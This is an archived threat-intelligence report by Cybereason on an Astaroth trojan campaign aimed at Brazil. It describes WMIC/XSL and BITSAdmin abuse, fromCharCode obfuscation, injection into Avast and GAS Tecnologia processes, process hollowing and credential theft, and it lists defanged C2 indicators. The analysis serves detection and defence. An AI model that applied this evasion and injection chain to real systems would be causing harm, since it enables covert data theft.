{
	"id": "e95cd0af-8537-4116-bf23-b2ca5b2d48b0",
	"created_at": "2026-04-06T00:18:38.743953Z",
	"updated_at": "2026-04-10T03:21:19.209032Z",
	"deleted_at": null,
	"sha1_hash": "45a4d9df3042f5e2b744171d01fa58f470eb884c",
	"title": "Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 529361,
	"plain_text": "Astaroth Malware Uses Legitimate OS and Antivirus Processes to\r\nSteal Passwords and Personal Data\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-02 11:11:27 UTC\r\nResearch By: Eli Salem\r\nIn 2018, we saw a dramatic increase in cyber crimes in Brazil and, separately, the abuse of legitimate native\r\nWindows OS processes for malicious intent. Cyber attackers used living off the land binaries (LOLbins) to hide\r\ntheir malicious activity and operate stealthily in target systems. Using native, legitimate operating system tools,\r\nattackers were able to infiltrate and gain remote access to devices without any malware. For organizations with\r\nlimited visibility into their environment, this type of attack can be fatal.\r\nIn this research, we explain one of the most recent and unique campaigns involving the Astaroth trojan. This\r\nTrojan and information stealer was recognized in Europe and chiefly affected Brazil through the abuse of native\r\nOS processes and the exploitation of security-related products.\r\nPervasive Brazilian Financial Malware Targets Bank Customers in Latin America and Europe\r\nThe Cybereason Platform was able to detect this new variant of the Astaroth Trojan in a massive spam campaign\r\nthat targeted Brazil and parts of Europe. Our Active Hunting Service team was able to analyze the campaign and\r\nidentify that it maliciously took advantage of legitimate tools like the BITSAdmin utility and the WMIC utility to\r\ninteract with a C2 server and download a payload. It was also able to use a component of multinational antivirus\r\nsoftware Avast to gain information about the target system, as well as a process belonging to Brazilian information\r\nsecurity company GAS Tecnologia to gather personal information. With a sophisticated attack such as this, it is\r\ncritical for your security team to have a clear understanding of your environment so they can swiftly detect\r\nmalicious activity and respond effectively. \r\nUnique Aspects to this Latest Version of the Astaroth Trojan Campaign\r\nThe Astaroth Trojan campaign is a phishing-based campaign that gained momentum towards the end of 2018 and\r\nwas identified in thousands of incidents. Early versions differed significantly from later versions as the adversaries\r\nadvanced and optimized their attack. This version contrasted significantly from previous versions in four key\r\nways.\r\n1. This version maliciously used BITSAdmin to download the attackers payload. This differed from early\r\nversions of the campaign that used certutil.\r\n2. This version injects a malicious module into one of Avast's processes, whereas early versions of the\r\ncampaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an\r\neffective evasive strategy.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 1 of 14\n\n3. This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian\r\ninformation security company GAS Tecnologia, to gather personal information undetected. This trusted\r\nprocess is prevalent on Brazilian machines. To the best of our knowledge, no other versions of the malware\r\nused this process.\r\n4. This version used a fromCharCode() deobfuscation method to avoid explicitly writing execution\r\ncommands and help hide the code it is initiating. Earlier versions did not use this method.\r\nA Breakdown of the Latest Astaroth Trojan Spam Campaign\r\nAs with many traditional spam campaigns, this campaign begins with a .7zip file. This file gets downloaded to a\r\nuser machine through a mail attachment or a mistakenly-pressed hyperlink.\r\nThe downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware.\r\n \r\nThe .lnk file extracted from the .7zip file.\r\nAn obfuscated command is located inside the Target bar in the .lnk file properties. \r\nHidden command inside the .lnk file.\r\n \r\nThe full obfuscated command inside the .lnk file.\r\nWhen the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use\r\nthe legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack\r\nexecutes embedded JScript or VBScript in an XSL stylesheet located on a remote domain\r\n(qnccmvbrh.wilstonbrwsaq[.]pw).\r\nwmic.exe is a powerful, native Windows command line utility used to interact with Windows Management\r\nInstrumentation (WMI). This utility is able to execute complicated WQL queries and WMI methods. It is often\r\nused by attackers for lateral movement, reconnaissance, and basic code invocation. By using a trusted, native\r\nutility, the attackers can hide the scope of the full attack and evade detection.\r\nThe initial attack vector as detected by the Cybereason Platform.\r\nwmic.exe creates a .txt file with information about the domain that stores the remote XSL script. It identifies the\r\nlocation of the infected machine, including country, city, and other information. Once this information is gathered,\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 2 of 14\n\nit sends location data about the infected machine to the remote XSL script.\r\nThis location data gives the attacker a unique edge, as they can specify a target country or city to attack and\r\nmaximize their accuracy when choosing a particular target. \r\nThe .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab\r\nenvironment.\r\nPhase one: An Analysis of the Remote XSL\r\nThe remote XSL script that wmic.exe sends information to contains highly obfuscated JScript code that will\r\nexecute additional steps of the malicious activity. The code is obfuscated in order to hide any malicious activity on\r\nthe remote server.\r\nInitially, the XSL script defines several variables for command execution and data storage. It also creates several\r\nActiveX objects. The majority of ActiveX Objects created with Wscript.Shell and Shell.Application are used to\r\nrun programs, create shortcuts, manipulate the contents of the registry, or access system folders. These variables\r\nare used to invoke legitimate Windows OS processes for malicious activities, and serve as a bridge between the\r\nremote domain that stores the script and the infected machine.  \r\n \r\nMalicious script variables.\r\nObfuscation Mechanism for the JScript Code\r\nThe malicious JScript code obfuscation relies on two main techniques.\r\n1. The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code\r\nunits. By using this function, it avoids explicitly writing commands it wants to execute and it hides the\r\nactual code it is initiating. In particular, the script uses this function to hide information related to process\r\nnames. To the best of our knowledge, this method was not used in early versions of the spam campaign.\r\n2. The script uses the function radador(), which returns a randomized integer. This function is able to\r\nobfuscate code so that every iteration of the code is presented differently. In contrast to the first method of\r\nobfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign. \r\n String.fromCharCode() usage in the XSL script. \r\nThe random number generator function radador().\r\n These two obfuscation techniques are used to bypass antivirus defenses and make security researcher\r\ninvestigations more challenging.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 3 of 14\n\nChoosing a C2 Server\r\nThe XSL script contains variable xparis() that holds the C2 domain the malicious files will be downloaded from.\r\nIn order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2\r\ndomains that xparis() can be set to. In order to decide which domain xparis() holds, a variable pingadori() uses the\r\nradador() function to randomize the domain. pingadori() is a random integer between one and twelve, which\r\ndecides which domain xparis() is assigned.\r\nThe C2 domain selection mechanism.\r\nOne of the most used functions in the XSL script is Bxaki(). Bxaki() takes a URL and a file as arguments. It\r\ndownloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the\r\nscript attempts to download a file.\r\nIn previous iterations, the Astaroth Trojan campaign used cerutil to download files. In order to hide this process, it\r\nwas renamed certis. In this iteration, they have replaced certutil with BITSAdmin.\r\n Bxaki obfuscated function.\r\nBxaki\r\ndeobfuscated function.\r\nIn order to gain access to the infected computer’s file system, the XSL script uses the variable fso with\r\nFileSystemObject capabilities. This variable is created using an ActiveX object. The XSL script contains\r\nadditional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded\r\nfiles. \r\nThe file’s path.  \r\nThe directory creation. \r\nDownloading the Payloads\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 4 of 14\n\nThe remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and\r\nextensionless files. These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected\r\nmachine by Bxaki() and xparis(). Within these twelve files are the Astaroth Trojan modules, several additional\r\nfiles the Trojan may use to extend its capabilities, and an r1.log file. The r1.log file stores information for\r\nexfiltration. A thorough explanation of what information is collected can be found in a breakdown by Cofense\r\nfrom late 2018. \r\nThe script verifies all parts of the malware have been downloaded. \r\nAfter downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded. \r\nOne of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth. \r\nThe twelve downloaded files.\r\nDetecting Avast \r\nA unique feature of this latest Astaroth Trojan campaign is the malware's ability to search for specific security\r\nproducts and exploit them.\r\n In earlier variants, upon detecting Avast, the XSL script would simply quit. Instead, it now uses Avast to execute\r\nmalicious actions. \r\nSimilar to earlier versions of the Astaroth Trojan campaign, the XSL script searches for Avast on the infected\r\nmachine, and specifically targets a certain process of Avast aswrundll.exe. It uses three variables stem1, stem2,\r\nand stem3 that, when combined, form a specific path (C:\\Program Files\\AVAST Software\\AVAST\\aswRunDll.exe)\r\nto aswRundll.exe. It obfuscates this path using the fromCharCode() function.\r\naswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for\r\nAvast. If aswrundll.exe exists at this path, Avast exists on the machine.\r\nNote: aswrundll.exe is very similar to Microsoft’s own rundll32.exe - it allows you to execute DLLs by calling\r\ntheir exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 5 of 14\n\nStem variables presented as unicode strings.\r\nStem variables decoded to ASCII.\r\nManipulating Avast\r\nOnce the XSL script has identified that Avast is installed on the machine, it loads a malicious module\r\nIrdsnhrxxxfery64 from its location on disk. In order to load this module, it uses an ActiveX Object ShA created\r\nwith Shell.Application capabilities. The object uses ShellExecute() to create an aswrundll.exe process instance\r\nand loads Irdsnhrxxxfery64. It loads the module with parameter vShow set to zero, which opens the application\r\nwith a hidden window. \r\nAlternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exe.\r\nregsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the\r\nWindows registry. \r\n The script attempts to load the malicious module using regsvr with the run function. \r\nProcmon shows the malicious module loaded to the Avast process.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 6 of 14\n\nProcmon shows the malicious module loaded using the regsvr32.exe process.  \r\nPhase two: Payload Analysis \r\n \r\nThe only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer.\r\n Information pertaining to lrdsnhxxfery64.~.\r\nAfter unpacking the module, it is packed with an additional inner packer Pe123\\RPolyCryptor. This module has\r\nto be investigated in a dynamic way to fully understand the malware and the role the module played during\r\nexecution.\r\nInformation pertaining to lrdsnhrxxfery64_Unpacked.dll.\r\n Throughout the malware execution, Irdsnhrxxxfery64.~ acts as the main malware controller. The module\r\ninitiates the malicious activity once the payload download is complete. It executes the other modules and collects\r\ninitial information about the machine, including information about the network, locale, and the keyboard\r\nlanguage. \r\n The main module collecting information about the machine.\r\nContinuing Malicious Activity and Manipulating Additional Security Products\r\nAfter the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module\r\nIrdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW() function.\r\nSimilar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected\r\ninto that process instead of regsvr32.exe. \r\nIrdsnhrxxxfery64 injecting lrdsnhrxxfery98.\r\nThe malicious modules in regsvr32.exe memory\r\nAfter the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious\r\nactivity depending on the way Irdsnhrxxxfery64 was loaded.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 7 of 14\n\n1. If Irdsnhrxxxfery64 is loaded using aswrundll.exe, the module will continue to target aswrundll.exe. It\r\nwill create new instances and continue to inject malicious content to it.\r\n2. If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes:\r\nIt will target unins000.exe if it is available. unins000.exe is a process developed by GAS Tecnologia that\r\nis common on Brazilian machines.\r\nIf unins000.exe does not exist, it will target Syswow64\\userinit.exe. userinit.exe is a native Windows\r\nprocess that specifies the program that Winlogon runs when a user logs on to their computer. Similarly, if\r\nunins000.exe and Syswow64\\userinit.exe do not exist, it will target System32\\userinit.exe.\r\nThe malware searches for targeted processes.\r\nIrdsnhrxxxfery64 manipulation on userinit.exe \u0026 unins000.exe\r\nInjection Technique To Increase Stealthiness\r\nAfter locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to\r\nevasively create a new process from a legitimate source. This new process is in a suspended state so the malware\r\ncan unmap its memory and write its contents to the new, allocated space. Once this is complete, it will resume the\r\nsuspended process. By using this technique, the malware is able to leverage itself from a signed and verified\r\nlegitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified\r\nsecurity product process.\r\n \r\nAstaroth module creates a process in a suspended state (dwCreationFlags set to 4).\r\nUnmapping process memory.\r\nWriting content and resuming the process.\r\nThe Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~,\r\nIrdsnhrxxxfery98.~, and module arqueiro. \r\nThe downloaded modules found in regsvr32.exe as detected by the Cybereason platform.\r\nData Exfiltration\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 8 of 14\n\nThe second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to\r\ncollect information through hooking, clipboard usage, and monitoring the keystate.\r\nIrdsnhrxxxfery98 information collecting capabilities.\r\nIn addition to its own information stealing capabilities, the Astaroth Trojan campaign also uses an external feature\r\nNetPass. NetPass is one of the downloaded payload files renamed to lrdsnhrxxferyb.jpg.\r\nNetPass is a free network password recovery tool that, according to its developer Nirsoft, can recover passwords\r\nincluding:\r\nLogin passwords of remote computers on LAN.\r\nPasswords of mail accounts on an exchange server stored by Microsoft Outlook.\r\nPasswords of MSN Messenger and Windows Messenger accounts.\r\nInternet Explorer 7.x and 8.x passwords from password-protected web sites that include Basic\r\nAuthentication or Digest Access Authentication.\r\nThe item name of Internet Explorer 7 passwords that always begin with Microsoft_WinInet prefix.\r\nThe passwords stored by Remote Desktop 6. \r\nNetPass usage.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 9 of 14\n\nAttack Flow and Exfiltration\r\nAfter injecting into the targeted processes, the modules continue their malicious activity through those processes.\r\nThe malware executes malicious activity in a small period of time through the target process, deletes itself, and\r\nthen repeats. This occurs periodically and is persistent.\r\nThe malware’s\r\ndifferent functionality.\r\nOnce the targeted processes are infected by the malicious modules, they begin communicating with the payload\r\nC2 server and exfiltrating information saved to the r1.log file. The communication and exfiltration of data was\r\ndetected in a real-world scenario using the Cybereason platform.\r\nThe malicious use of GAS Tecnologia security process unins000.exe. \r\nData exfiltration from unins000.exe to a malicious IP. \r\nConclusion\r\nOur Active Hunting Service was able to detect both the malicious use of the BITSAdmin utility and the WMIC\r\nutility. Our customer immediately stopped the attack using the remediation section of our platform and prevented\r\nany exfiltration of data. From there, our hunting team identified the rest of the attack and completed a thorough\r\nanalysis.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 10 of 14\n\nWe were able to detect and evaluate an evasive infection technique used to spread a variant of the Astaroth Trojan\r\nas part of a large, Brazilian-based spam campaign. In our discovery, we highlighted the use of legitimate, built-in\r\nWindows OS processes used to perform malicious activities to deliver a payload without being detected, as well as\r\nhow the Astaroth Trojan operates and installs multiple modules covertly. We also showed its use of well-known\r\ntools and antivirus products to expand its capabilities. The analysis of the tools and techniques used in the\r\nAstaroth campaign show how truly effective LOLbins are at evading antivirus products. As we enter 2019, we\r\nanticipate that the use of LOLbins will likely increase. Because of the great potential for malicious exploitation\r\ninherent in the use of native processes, it is very likely that many other information stealers will adopt this method\r\nto deliver their payload into targeted machines.\r\nAs a result of this detection, the customer was able to contain an advanced attack before any damage was done.\r\nThe Astaroth Trojan was controlled, WMIC was disabled, and the attack was halted in its tracks.\r\nPart of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security\r\nteams aware of the complications ensuring a secure system, as with our customer above. LOLbins are deceptive\r\nbecause their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus\r\nsoftware. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will\r\nbecome more common as well. The potential for damage will grow as attackers will look to other more destructive\r\npayloads.\r\nFor more information on LOLbins in the wild, read our research into a different Trojan. \r\nLOLbins and Trojans: How the Ramnit Trojan Spreads via sLoad in a Cyberattack\r\nIndicators of CompromisE\r\nSHA1\r\n01782747C12Bf06A52704A144DB59FEC41B3CB36\r\nHash NF-e513468.zip\r\nSHA1\r\n1F83403398964D4E8B6C70B171C51CD278909172\r\nHash Script.js\r\nSHA1\r\nCE8BDB56CCAC55C6881701EBD39DA316EE7ED18D\r\nHash lrdsnhrxxfery64.~\r\nSHA1\r\n926137A50f473BBD257CD19E207C1C9114F6B215\r\nHash lrdsnhrxxfery98.~\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 11 of 14\n\nSHA1\r\n5579E03EB1DA076EF939196CB14F8B769F30A302\r\nHash lrdsnhrxxferyb.jpg\r\nSHA1\r\nB2734835888756929EE3FF4DCDE85080CB299D2A\r\nHash lrdsnhrxxferyc.jpg\r\nSHA1\r\n206352E13D601239E2D043D971EA6657C091071A\r\nHash lrdsnhrxxferydwwn.gif\r\nSHA1\r\nEAE82A63A980998F8D388BCCE7D967F28309F593\r\nHash lrdsnhrxxferydwwn.gif\r\nSHA1\r\n9CD5A399C9320CBFB87C9D1CAD3BC366FB12E54F\r\nHash lrdsnhrxxferydx.gif\r\nSHA1\r\n206352E13D601239E2D043D971EA6657C091071A\r\nHash lrdsnhrxxferye.jpg\r\nSHA1\r\n4CDE9A53A9A49D606BC89E74D47398A69E767056\r\nHash lrdsnhrxxferyg.gif\r\nSHA1\r\nF99319B1B321AE9F2D1F0361BC756A43D25444CE\r\nHash lrdsnhrxxferygx.gif\r\nSHA1\r\nB85C106B68ED410107f97A2CC38b7EC05353F1FA\r\nHash lrdsnhrxxferyxa.~\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 12 of 14\n\nSHA1\r\n77809236FDF621ABE37B32BF073B0B893E9CE67A\r\nHash lrdsnhrxxferyxb.~\r\nSHA1\r\nB85C106B68ED410107f97A2CC38b7EC05353F1fA\r\nHash lrdsnhrxxferyxa.~\r\nSHA1\r\nC2F3350AC58DE900768032554C009C4A78C47CCC\r\nHash r1.log\r\n104.129.204[.]41 IP C2\r\n63.251.126[.]7 IP C2\r\n195.157.15[.]100 IP C2\r\n173.231.184[.]59 IP C2\r\n64.95.103[.]181 IP C2\r\n19analiticsx00220a[.]com Domain C2\r\nqnccmvbrh.wilstonbrwsaq[.]pw Domain C2\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 13 of 14\n\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government\r\nintelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing\r\nnew attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The\r\nCybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit\r\ncyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research"
	],
	"report_names": [
		"information-stealing-malware-targeting-brazil-full-research"
	],
	"threat_actors": [],
	"ts_created_at": 1775434718,
	"ts_updated_at": 1775791279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.pdf",
		"text": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.txt",
		"img": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.jpg"
	}
}